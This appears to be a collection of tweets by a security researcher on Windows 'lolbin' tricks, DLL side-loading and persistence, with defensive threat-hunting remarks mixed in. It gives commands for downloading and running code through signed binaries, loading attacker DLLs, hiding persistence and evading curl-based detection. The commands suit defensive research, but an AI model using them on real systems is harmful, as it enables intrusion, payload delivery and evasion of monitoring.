This tweet contains a well-researched information presented in a politically neutral manner and can only be interpreted in a single way w/o causing any emotional response to the reader. It is factual. It is unconditional. It is absolute. It is uncancellable.
#FF
you
This is the most important security change you will do today.
1. Find c:\Program Files\Common Files\microsoft shared\OFFICE15\1033\MSOINTL.DLL
(adjust path for your Office version).
2. Hex-edit "Enable Content" to whatever you want e.g. "Infect System".
3. You are welcome.
C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe
accepts URL so you can use it as a downloader
excelcnv.exe -oice <URL> <filename>
caveat? your download will be saved as an XLSX and binary data will be stored encoded with UTF8 inside xl\sharedStrings.xml
#LOLBIN
Mini
#Lolbin
1. Copy c:\WINDOWS\system32\WebCache.exe to a different location
2. Drop malicious wininet.dll there
3. Run:
WebCache.exe 1 1
This willl load malicious wininet.dll via LoadLibraryW
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
ms-cxh-full://foo
will block your win10 desktop (doesn't work on win11)
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
*atm I don't know how to exit the thing
kudos to
@0gtweet
who inspired me to look at lolbin stuff again (as it is often the case)
so... everyone knows we can use ftp.exe as a lolbin
using COMSPEC trick we can do it again
set comspec=c:\windows\notepad.exe
ftp.exe
!
A nice, little Downloads&Execute
#LOLBIN
feature of signed SpotifySetup.exe
SpotifySetup.exe --url <url>
Other options
--mu ..\..\..\..\..\..\..\..\test\ downloads that file to c:\test\SpWebInst0.exe and launches from there
-- silent - quieter, but mini-GUI still shows up
I wrote about side-loading of MSFTEDIT.DLL before and today realized that charmap.exe uses LoadLibrary as well
1. save payload as MSFTEDIT.DLL
2. copy c:\windows\system32\charmap.exe .
3. charmap.exe
If Broadcom buys VMware the RCE analysts working there will be called Broadcom VMware CarbonBlack CA Technologies Symantec Norton Lastline Reverse Code Engineering Analysts
If you rely on CommandLine in Sysmon, you may want to check this out. And I am almost certain someone did point it out before... oh well...
examples:
c:\windows\system32\calc.exe\..\notepad.exe
c:\windows\system32\calc.exe\..\..\system32\notepad.exe
I guess everyone knows about this Lolbin:
RunDll32.exe shell32.dll,Control_RunDLL c:\test\test.dll
but about this one?
RunDll32.exe Shell32.dll,Control_RunDLLAsUser c:\test\test.dll
#LOLBIN
looks like Windows tar can BASE64-encode and UUEncode
tar -c -f <out> --b64encode <in>
tar -c -f <out> --uuencode <in>
and it can run (lolbin) other programs same as its *nix counterpart
tar -cff --use-compress-program calc f
C:\Program Files\Internet Explorer>set windir=c:\test
C:\Program Files\Internet Explorer>iediagcmd.exe /out:c:\test\
will run c:\test\system32\netsh.exe of your choice
#lolbin
via env. var. windir
a silly way to launch programs at a predetermined position in a great-great-great....grand-child relationship
start /b "" start /b "" start /b "" start /b "" start /b "" start /b notepad.exe
/b takes care of conhost.exe processes (aka all share same console)
so, how many of you visited solar leaks page from your main working computer, on your production network?
the number of infosec people posting a direct link to it is mind-blowing
assumption should be it's hosted by attackers, hello ?
combing through my old code I found one of my early API hooking experiments from early 2006 -- by hooking ExtTextOut was able to steal text from any application (global hook was there to catch new programs as well) -- I guess should have written that EDR back then ;)
Certulitis - one tool that keeps on giving
e.g.
set CERTSRV_LOGFILE=c:\test\foo.log
set CERTSRV_DEBUG=0xFFFFFFFF
certutil you never knew existed (good clickbait!)
what are download cradles out there?
I know of this nice list
any other repos like this?
IE/VBS, python, ruby, perl, gcc, git, wget, curl with exec/eval?
This is a far more interesting 'feature' of setup.exe - a persistence trick really
Drop your payload to
c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
and c:\WINDOWS\system32\oobe\Setup.exe will load it anytime it errors (at least; enough to run it w/o cmd line to trigger)
curl (included Windows version) built-in support for parenthesis and square brackets is fun and may evade some naive regexes
curl {
http://...}
curl {h}{t}{t}{p}://...
curl .../{foo}{bar} -o
#2
#1
// will save the downloaded file as "barfoo")
curl [1-5]
// awkward delay via DNS
It's really worth updating Process Hacker on regular basis
TIL new versions include very advanced PE file viewer showing lots of cool info, both static and dynamic and from the file and file system, all in one place
In 2010 I worked a case working 18h/day, for a month, developed insomnia. Didn't get any extra pay, no one said thank you. It changed the way I work. I then started my blog. 10 years later still not sleeping enough & yet still loving it. Channel your obsessions properly kids :)
Beyond good ol’ Run key, Part 108
#dfir
#malware
Using HKLM\SOFTWARE\Microsoft\Wow64\x86\<processname> to inject 64-bit DLL of your choice into 32-bit processes
if you ever get bored using "copy" to copy files you can always use ... curl
curl file://c:\test\foo -o bar
same way, you can use it instead of "type" or "cat"
curl file://c:\test\foo
Copy c:\WINDOWS\system32\oobe\Setup.exe to c:\test
Drop payload to c:\test\winsetup.dll
setup.exe will load c:\test\winsetup.dll
lots of other side-loading opportunities there really 9see screenshot), but still lame, cuz need admin rights to run setup.exe :(
win10
drop C:\Windows\System32\ntwdblib.dll
run c:\WINDOWS\system32\cliconfg.exe
ntwdblib.dll will get loaded
too many caveats (admin rights, UAC) for it to be useful, but always...
kinda lame persistence trick, kinda lame lolbin - 2 in one lame :)
Beyond good ol’ Run key, Part 136
(Persistence trick +
#lolbin
in 1) x 2
Thx to test Office DLLs:
HKCU\SOFTWARE\Microsoft\Office\16.0\
Word\WwlibtDll -> wwlibt.dll
PowerPoint\PPCoreTDLL -> ppcoret.dll
#DFIR
Powershell keywords: what stuff do you look for inside the Script Blocks?
This is a great cheatsheet that contains a lot of keywords (by Malware Archaeology)
but wondering if this could be improved. reversed strings? new keywords for new ps modules?
Did anyone look at w32tm.exe for C2 comms?
w32tm /monitor /computers:xxx
w32tm /stripchart /computer:xxx
W32tm /query /computer:xxx
connect out to xxx:123
w32tm /stripchart /computer:xxx /ipprotocol:6
will use IPv6
Printing
#LOLBIN
create dummy file (foo)
copy rundll32.exe to c:\test\rundll32.exe
copy DLL payload to c:\test\photowiz.dll
run
rundll32 c:\WINDOWS\system32\shimgvw.dll,ImageView_PrintTo c:\test\foo
ImageView_PrintToA & ImageView_PrintToW should work too (W needs Unicode tho)
insipred by
@SentinelOne
research on desktopimgdownldr
here is a list of native exes using BITS to download stuff...
#LOLBIN
potentials
❓aitstatic
✔️bitsadmin
✔️desktopimgdownldr
❓DeviceEnroller
❓directxdatabaseupdater
❓MDMAppInstaller
❓SpeechModelDownload
Excelling with sysmon configs yes, it is what it sounds like; a totally cringeworthy experience :) kudos to
@ionstorm
for his sysmon config that I tortured with this idea
#threathunting
#dfir
Just in case you are wondering, Mitre Att&ck misses and quite a bit. This is not a criticism per se -- it's a great framework and work in progress. These things will be eventually added (and sometimes corrected).
I blatantly hijacked the idea and added some practical advice on how to become Alex 2.0. Reversing w/o reversing – how to become Alex in practice cc
@aionescu
lulz, I created this .exe file from strings reported in one of the malware reports - no code inside other than ExitProcess, just strings... tell me that next-gen and others don't really on signatures :-D
#malware
ms-cxh - the Cloud Experience Host handler has some interesting strings it accepts e.g.
ms-cxh://SETADDLOCALONLY creates new user
ms-cxh://NTHNGCUPSELL creates PIN
ms-cxh://RDXRACSKUINCLUSIVE get latest demo content and apps
full list
today got an idea to look at .TLB files as a possible code injection trick (it has a built-in, but rarely used 'helpstringdll' reference that points to a DLL)
after some googling discovered
@StanHacked
already did a great research on this topic!
You got your Sysmon config
You plug it in to your ELK/Splunk
Detections start coming in and are tagged with Mitre Att&ck techniques
2 Questions:
- How do you refer to these detections, if at all?
- How do you process / analyze them? (alert/dashboard/?)
genuine Qs
fun fact:
if you append any .cab files to extrac32.exe, then when you run this new file, extrac32.exe stub will extract the content of the appended .cab file w/o any question; I guess files with _A_EXEC attr should be executed (have not tried)
TIL there is cbd.exe in VMware Workstation
c:\Program Files (x86)\VMware\VMware Workstation\OVFTool\cdb.exe
cc
@Oddvarmoe
perhaps worth updating
can help to dump memory, and lots of other funny stuff